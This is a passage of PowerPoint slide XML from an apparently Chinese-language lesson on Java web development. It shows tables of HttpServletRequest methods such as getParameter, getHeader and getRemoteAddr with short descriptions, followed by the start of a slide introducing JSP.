                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>返回</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>request</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>的字符编码集名称</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">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380656">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>String </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>getContentType</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>返回</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>request</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>主体的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>MIME</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>类型，若未知则返回</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>null</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">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380656">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>String getContextPath()</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>返回</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>request URI</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>中指明的上下文路径</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380656">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>String </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>getHeader</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>(String name)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>返回</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>指定的信息头</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">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0D8E8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="表格 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6054644" y="2173506"/>
          <a:ext cx="5160606" cy="3958551"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5160606"/>
              </a:tblGrid>
              <a:tr h="372438">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>方法</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&amp; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>描述</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" alt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F81BD"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="398457">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>String getMethod()</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>返回此</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>request</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>中的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>HTTP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>方法，比如 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>GET,，POST，</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>或</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>PUT</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB">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398457">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>String getParameter(String name)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>返回此</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>request</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>中</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>指定的参数，若不存在则返回</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>null</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB">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398457">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>String getQueryString()</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>返回此 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>request URL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>包含的查询字符串</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398457">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>String getRemoteAddr()</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>返回客户端的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>IP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>地址</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398457">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>String getRemoteHost()</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>返回客户端的完整名称</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398457">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>String getServletPath()</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>返回所请求的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>servlet</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>路径</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398457">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>String[] getParameterValues(String name)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>返回指定名称的参数的所有值，若不存在则返回</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>null</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB">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8E8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="398457">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>int getIntHeader(String name)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>返回指定名称的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>request</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>信息头的值</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US">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DF4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="398457">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>int </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>getServerPort</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0066FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>返回服务器端口号</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="10097" marR="10097" marT="14135" marB="1413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0D8E8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JSP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="7200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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4" name="标题 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="721200" y="3690517"/>
            <a:ext cx="10749599"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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为什么用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSP?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="765609" y="4281214"/>
            <a:ext cx="11000633" cy="1393947"/>
            <a:chOff x="1024418" y="5599087"/>
            <a:chExt cx="10401146" cy="1393947"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="TextBox 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1496828" y="5969292"/>
              <a:ext cx="9928736" cy="1023742"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>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285750" indent="-285750">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="l"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>对</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:effectLst/>
